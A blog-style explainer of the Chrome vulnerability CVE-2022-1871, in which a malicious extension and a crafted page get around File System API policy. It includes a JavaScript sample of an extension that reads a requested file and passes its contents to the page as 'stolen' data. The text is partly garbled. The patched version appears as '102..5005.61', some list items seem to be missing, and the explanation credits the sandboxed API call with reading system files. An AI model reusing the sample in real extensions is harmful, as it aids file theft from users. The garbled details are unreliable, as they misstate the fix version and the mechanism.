CVE-2022-1871 - How Insufficient Policy Enforcement in Chrome's File System API Opened the Door for Malicious Extensions

In today’s digital world, web browsers are at the heart of almost everything we do. Millions rely on Google Chrome for everyday browsing—banking, shopping, work, you name it. To make browsers more powerful, developers often leverage APIs like the File System API, which lets web applications interact with local files (in a sandboxed, controlled way). But sometimes the controls are not tight enough, and that’s how vulnerabilities like CVE-2022-1871 creep in.

In early 2022, a flaw in Chrome’s File System API made it possible for a malicious browser extension—if a user was tricked into installing it—to bypass existing file system policies using a specially crafted HTML page. Before Chrome's v102..5005.61 update, attackers could potentially access or modify files in ways that Google's policy was supposed to block. This post explains how the vulnerability worked, its impact, and what the exploitation would look like.

Access Vector: User had to be tricked into installing a malicious extension

At its heart, CVE-2022-1871 is about “insufficient policy enforcement.” The File System API is designed to let web pages work with files, but within strict limits—unless an extension steps in and abuses the trust model, stretching what is allowed using manipulated web content.

Use the extension and the crafted page together to bypass file system policies.

Outcome: The attacker could perform unauthorized file operations (read, write, delete) in the victim’s file system, that should normally have been prohibited by the browser's policies.

Technical Details

Chrome’s File System API restricts web pages from direct, unsandboxed file access. Extensions, however, can request more powerful permissions, given user consent. There was a logical gap in how Chrome enforced the policy between web content running in a page and “trusted” extension code.

Let’s imagine the exploit flow in pseudo-code. The attacker’s extension injects a script or message into a web page, making it issue file system API calls *on behalf of the extension*, rather than the sandboxed webpage.

Code Snippet: Exploiting File System API via Extension

// Part of the malicious extension's background.js

chrome.runtime.onMessage.addListener(
  function(request, sender, sendResponse) {
    if (request.action === "readFile") {
      // Attempt to access filesystem in a privileged context
      window.webkitRequestFileSystem(
        window.PERSISTENT, 1024 * 1024, // 1MB
        function(fs) {
          fs.root.getFile(request.filename, {}, function(fileEntry) {
            fileEntry.file(function(file) {
              var reader = new FileReader();
              reader.onloadend = function(e) {
                // Send file content back to the web page
                sendResponse({content: this.result});
              };
              reader.readAsText(file);
            });
          });
        }
      );
      // Required for asynchronous response
      return true;
    }
  }
);

// Injected in crafted HTML page (content script)
chrome.runtime.sendMessage(
  "<extension_id>", 
  {action: "readFile", filename: "example.txt"}, 
  function(response) {
    // Now the web page can access file content that should be restricted
    console.log("Stolen file content:", response.content);
  }
);

> Explanation: The crafted HTML page calls the extension (using chrome.runtime.sendMessage), which then reads system files using elevated privileges and sends the result back to the web page—*something that should never be allowed under normal policy.*

Real-World Impact

If a user installed such a malicious extension—perhaps promised as a PDF editor or productivity tool—and then visited a hacker-controlled page, the attacker could:

Exfiltrate private content over the web.

Safeguards in Chrome are supposed to make this kind of direct hand-off impossible, but the insufficient enforcement allowed the extension to act as a “middle-man”, breaking the boundary.

References

- Chrome Releases: Stable Channel Update for Desktop (2022-05-24)
- NIST NVD Entry for CVE-2022-1871
- Chromium Bug Tracker: Issue 1314195 (may require Chromium access permissions)
- Chrome API Docs: File System API

Remediation and Lessons

Google fixed the issue in Chrome 102..5005.61. If you’re using any earlier version, update now.

For users: Never install extensions from untrusted sources. Check permissions closely.

- For developers: Always follow the least-privilege principle. Assume any communication between extensions and web content may be abused.

Conclusion

CVE-2022-1871 is a classic example of how attackers can chain together *user psychology* (tricking people into installing extensions) and *technical oversights* (weak policy enforcement) to break security models. Patch early, stay vigilant, and treat every extension as a potential risk.


If you want more technical breakdowns like this, check out the Chrome Security Blog or follow CVE updates at the NVD. Stay safe, and keep your browser updated!

Timeline

Published on: 07/27/2022 22:15:00 UTC
Last modified on: 08/15/2022 11:17:00 UTC